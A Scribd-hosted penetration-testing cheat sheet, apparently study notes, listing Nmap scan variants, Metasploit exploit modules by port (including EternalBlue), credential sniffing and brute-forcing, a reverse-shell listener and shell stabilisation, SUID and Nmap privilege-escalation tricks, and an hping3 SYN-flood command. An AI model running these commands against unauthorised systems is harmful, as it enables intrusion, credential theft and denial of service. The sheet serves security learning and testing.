Scribd
Upload
63 views5 pages

Cybersecurity Commands Guide

The document is a comprehensive guide on various cybersecurity commands and techniques, including Recon NG, Nmap, Metasploit, and brute force attacks. It details commands for scanning, OS detection, and exploiting vulnerabilities across different ports. Additionally, it covers methods for capturing credentials and performing denial-of-service attacks.

Uploaded by

manyam vamsi nadh reddy
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
63 views5 pages

Cybersecurity Commands Guide

The document is a comprehensive guide on various cybersecurity commands and techniques, including Recon NG, Nmap, Metasploit, and brute force attacks. It details commands for scanning, OS detection, and exploiting vulnerabilities across different ports. Additionally, it covers methods for capturing credentials and performing denial-of-service attacks.

Uploaded by

manyam vamsi nadh reddy
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

Cybersecurity Command Reference Guide

RECON NG Commands

- marketplace search: Search for available modules.

- marketplace install /modulepath/: Install a specific module from the marketplace.

- modules load modulepath: Load the installed module for use.

- options set SOURCE url: Set the target source or URL.

- info: Get information about the loaded module.

- run: Execute the module.

Nmap Commands - Basic Scanning

- nmap -sn ip: Check if a server is up (ping scan).

- nmap website.com: Resolve IP address of a domain.

- nmap -sS ip: Perform a stealth SYN port scan.

OS Detection

- nmap -sn youriplastoctet-255: Scan entire local subnet.

- nmap yourip -O: Attempt OS detection.

- sudo nmap -O --osscan-guess <target_ip>: Guess the OS more aggressively.

Version Detection

- nmap -sS ip: Initial port scan.

- nmap -sS ip -p <port> -sV: Detect service version on a specific port.

Advanced Port Scanning

TCP Scan:

- nmap -sT ip: Perform a TCP connect scan.

- nmap -sT ip -p <port>: TCP connect scan on specific port.

FIN Scan:

- nmap -sF ip: Perform a FIN scan.


- nmap -sF ip -p <port>: FIN scan on a specific port.

UDP Scan:

- nmap -sU ip: Perform a UDP scan.

Aggressive Scan:

- nmap -A ip: Perform OS detection, version detection, script scanning, and traceroute.

NULL Scan:

- nmap -sN ip: Perform a NULL scan.

XMAS Scan:

- nmap -sX ip: Perform a Xmas tree scan.

Firewall Bypass

- nmap -O -Pn <target>: Skip ping and enable OS detection, bypassing ping-disabled hosts.

Full TCP Scan with Version Detection

- nmap -p- -sV <ip>: Scan all 65535 TCP ports and detect services.

Metasploit Framework for FTP (Port 21)

- msfconsole: Start Metasploit Framework.

- search <version>: Search for exploit modules.

- use <module>: Select an exploit module.

- set RHOST <target>: Set the target IP.

- show options: Show required parameters.

- exploit: Run the exploit.

Telnet Credential Capture using Wireshark

- telnet <target_ip>: Start telnet session.

- Use Wireshark to capture traffic -> Follow TCP stream to view credentials.

- Brute-force: Use msfconsole with user and pass file for automation.
robots.txt

- robots.txt is a plain text file placed at root domain to guide bots on what not to index.

- URL example: https://example.com/robots.txt

Brute Force Attacks

- gobuster dir -u <ip> -w <wordlist>: Discover hidden directories.

- wpscan --url <login_page> -U <user> -P <wordlist>: Brute-force WordPress login.

PHP Reverse Shell

- locate php-re*: Locate reverse shell scripts.

- gedit reverseshell.php: Edit or create a reverse shell script.

Netcat (nc)

- nc [options] [target IP] [port]: Basic syntax.

- nc -lvp 443: Listen on port 443 with verbose output.

Use Cases:

- Reverse shells

- File transfers

- Port scanning

Reverse Shell Shell Stabilization

- python -c 'import pty;pty.spawn("/bin/bash")': Get a fully interactive TTY shell.

Find SUID Files

- find / -perm -4000 -type f 2>/dev/null: Search for all SUID binaries.

Interactive Nmap Shell

- nmap --interactive: Open interactive mode.

- !whoami: Run shell command.

- !ls /root: Access root directory (if permitted).


Metasploit Modules by Ports

Port 21 - FTP:

- exploit/unix/ftp/vsftpd_234_backdoor

- exploit/windows/ftp/slmail_user

Port 22 - SSH:

- auxiliary/scanner/ssh/ssh_login

- auxiliary/scanner/ssh/ssh_version

Port 23 - Telnet:

- auxiliary/scanner/telnet/telnet_login

Port 80/443 - HTTP/HTTPS:

- exploit/unix/webapp/wp_admin_shell_upload

- exploit/windows/http/manageengine_connectionid_write

- auxiliary/scanner/http/http_version

- auxiliary/scanner/http/dir_scanner

Port 139/445 - SMB:

- exploit/windows/smb/ms17_010_eternalblue

- exploit/windows/smb/psexec

Port 3389 - RDP:

- auxiliary/scanner/rdp/rdp_scanner

- auxiliary/dos/windows/rdp/bluekeep

Port 3306 - MySQL:

- auxiliary/scanner/mysql/mysql_login

- auxiliary/admin/mysql/mysql_sql

- exploit/linux/mysql/mysql_udf_payload

DoS Attack with hping3


- sudo hping3 -i u1 -S -p 80 <target_ip>

- -i u1: Interval of 1 microsecond per packet.

- -S: Send SYN packets (simulate TCP connection request).

- -p: Target port (e.g., 80 for HTTP).

You might also like